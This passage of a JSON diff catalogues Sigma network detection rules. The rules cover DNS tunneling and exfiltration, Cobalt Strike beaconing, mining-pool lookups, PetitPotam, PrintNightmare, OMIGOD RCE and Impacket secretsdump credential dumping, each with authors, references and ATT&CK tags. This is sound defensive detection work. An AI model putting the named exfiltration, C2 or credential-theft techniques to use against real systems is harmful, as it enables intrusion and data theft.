"meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/07", + "falsepositive": [ + "Valid software, which uses dns for transferring data" + ], + "filename": "net_dns_c2_detection.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004", + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", + "value": "Possible DNS Tunneling" + }, + { + "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", + "meta": { + "author": "Florian Roth, Matt Kelly (list of domains)", + "creation_date": "2022/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_external_service_interaction_domains.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/breakersall/status/1533493587828260866", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.reconnaissance", + "attack.t1595.002" + ] + }, + "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", + "value": "DNS Query to External Service Interaction Domains" + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_bytes_out.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", + "value": "High DNS Bytes Out" + }, + { + "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_null_records_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", + "value": "High NULL Records Requests Rate" + }, + { + "description": "High DNS requests amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", + "value": "High DNS Requests Rate" + }, + { + "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_txt_records_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", + "value": "High TXT Records Requests Rate" + }, + { + "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/05/10", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", + "value": "Cobalt Strike DNS Beaconing" + }, + { + "description": "Detects suspicious DNS queries to Monero mining pools", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/24", + "falsepositive": [ + "Legitimate crypto coin mining" + ], + "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496", + "attack.t1567" + ] + }, + "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", + "value": "Monero Crypto Coin Mining Pool Lookup" + }, + { + "description": "Detects suspicious DNS queries using base64 encoding", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/05/10", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_susp_b64_queries.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/krmaxwell/dns-exfiltration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", + "value": "Suspicious DNS Query with B64 Encoded String" + }, + { + "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/05", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "filename": "net_dns_susp_telegram_api.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://core.telegram.org/bots/faq", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102.002" + ] + }, + "uuid": "c64c5175-5189-431b-a55e-6d9882158251", + "value": "Telegram Bot API Request" + }, + { + "description": "Detects strings used in command execution in DNS TXT Answer", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/08", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_susp_txt_exec_strings.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", + "value": "DNS TXT Answer with Possible Execution Strings" + }, + { + "description": "Detects wannacry killswitch domain dns queries", + "meta": { + "author": "Mike Wade", + "creation_date": "2020/09/16", + "falsepositive": [ + "Analyst testing" + ], + "filename": "net_dns_wannacry_killswitch_domain.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", + "value": "Wannacry Killswitch Domain" + }, + { + "description": "Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "net_firewall_apt_equationgroup_c2.yml", + "level": "high", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", + "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.g0020", + "attack.t1041" + ] + }, + "uuid": "881834a4-6659-4773-821e-1c151789d873", + "value": "Equation Group C2 Communication" + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "filename": "net_firewall_high_dns_bytes_out.yml", + "level": "medium", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "3b6e327d-8649-4102-993f-d25786481589", + "value": "High DNS Bytes Out - Firewall" + }, + { + "description": "High DNS requests amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "filename": "net_firewall_high_dns_requests_rate.yml", + "level": "medium", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "51186749-7415-46be-90e5-6914865c825a", + "value": "High DNS Requests Rate - Firewall" + }, + { + "description": "Detects many failed connection attempts to different ports or hosts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Inventarization systems", + "Vulnerability scans" + ], + "filename": "net_firewall_susp_network_scan_by_ip.yml", + "level": "medium", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "4601eaec-6b45-4052-ad32-2d96d26ce0d8", + "value": "Network Scans Count By Destination IP" + }, + { + "description": "Detects many failed connection attempts to different ports or hosts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Inventarization systems", + "Vulnerability scans" + ], + "filename": "net_firewall_susp_network_scan_by_port.yml", + "level": "medium", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", + "value": "Network Scans Count By Destination Port" + }, + { + "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", + "meta": { + "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", + "creation_date": "2020/05/03", + "falsepositive": [ + "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "zeek_dce_rpc_domain_user_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/OTRF/detection-hackathon-apt29/issues/37", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1082" + ] + }, + "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", + "value": "Domain User Enumeration Network Recon 01" + }, + { + "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", + "meta": { + "author": "@neu5ron, SOC Prime", + "creation_date": "2020/03/19", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "filename": "zeek_dce_rpc_mitre_bzar_execution.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-execution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1053.002", + "attack.t1569.002" + ] + }, + "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", + "value": "MITRE BZAR Indicators for Execution" + }, + { + "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", + "meta": { + "author": "@neu5ron, SOC Prime", + "creation_date": "2020/03/19", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", + "value": "MITRE BZAR Indicators for Persistence" + }, + { + "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", + "meta": { + "author": "@neu5ron, @Antonlovesdnb, Mike Remen", + "creation_date": "2021/08/17", + "falsepositive": [ + "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." + ], + "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", + "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" + ], + "tags": [ + "attack.t1557.001", + "attack.t1187" + ] + }, + "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", + "value": "Potential PetitPotam Attack Via EFS RPC Calls" + }, + { + "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", + "meta": { + "author": "@neu5ron (Nate Guagenti)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Legitimate remote alteration of a printer driver." + ], + "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/corelight/CVE-2021-1675", + "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", + "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.1678", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", + "value": "Possible PrintNightmare Print Driver Install" + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "meta": { + "author": "OTR (Open Threat Research), @neu5ron", + "creation_date": "2018/11/28", + "falsepositive": [ + "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" + ], + "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", + "value": "SMB Spoolss Name Piped Usage" + }, + { + "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/06/23", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_default_cobalt_strike_certificate.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.s0154" + ] + }, + "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", + "value": "Default Cobalt Strike Certificate" + }, + { + "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", + "meta": { + "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", + "creation_date": "2021/08/19", + "falsepositive": [ + "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." + ], + "filename": "zeek_dns_mining_pools.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" + ], + "tags": [ + "attack.t1569.002", + "attack.t1496" + ] + }, + "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", + "value": "DNS Events Related To Mining Pools" + }, + { + "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>", + "meta": { + "author": "Michael Portera (@mportatoes)", + "creation_date": "2022/04/21", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_dns_nkn.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/nknorg/nkn-sdk-go", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://github.com/Maka8ka/NGLite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", + "value": "New Kind of Network (NKN) Detection" + }, + { + "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", + "meta": { + "author": "@neu5ron, SOC Prime Team, Corelight", + "creation_date": "2021/05/04", + "falsepositive": [ + "Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.", + "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" + ], + "filename": "zeek_dns_susp_zbit_flag.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://twitter.com/neu5ron/status/1346245602502443009", + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", + "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" + ], + "tags": [ + "attack.t1095", + "attack.t1571", + "attack.command_and_control" + ] + }, + "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", + "value": "Suspicious DNS Z Flag Bit Set" + }, + { + "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", + "meta": { + "author": "Saw Winn Naung , Azure-Sentinel", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_dns_torproxy.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" + ], + "tags": [ + "attack.t1048" + ] + }, + "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", + "value": "DNS TOR Proxies" + }, + { + "description": "Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", + "meta": { + "author": "SOC Prime, Adam Swan", + "creation_date": "2020/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_http_executable_download_from_webdav.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", + "value": "Executable from Webdav" + }, + { + "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", + "meta": { + "author": "Nate Guagenti (neu5ron)", + "creation_date": "2021/09/20", + "falsepositive": [ + "Exploits that were attempted but unsuccessful.", + "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." + ], + "filename": "zeek_http_omigod_no_auth_rce.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://twitter.com/neu5ron/status/1438987292971053057?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.lateral_movement", + "attack.t1068", + "attack.t1190", + "attack.t1203", + "attack.t1021.006", + "attack.t1210" + ] + }, + "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", + "value": "OMIGOD HTTP No Authentication RCE" + }, + { + "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_http_webdav_put_request.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", + "value": "WebDav Put Request" + }, + { + "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", + "meta": { + "author": "Josh Brower @DefensiveDepth", + "creation_date": "2020/08/22", + "falsepositive": [ + "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." + ], + "filename": "zeek_rdp_public_listener.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://attack.mitre.org/techniques/T1021/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" + ], + "tags": [ + "attack.t1021.001" + ] + }, + "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", + "value": "Publicly Accessible RDP Service" + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "meta": { + "author": "Samir Bousseaden, @neu5rn", + "creation_date": "2020/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_smb_converted_win_atsvc_task.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ] + }, + "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", + "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", + "meta": { + "author": "Samir Bousseaden, @neu5ron", + "creation_date": "2020/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_smb_converted_win_impacket_secretdump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ] + }, + "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", + "value": "Possible Impacket SecretDump Remote Activity - Zeek" + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "meta": { + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "creation_date": "2020/04/02", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "filename": "zeek_smb_converted_win_lm_namedpipe.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": 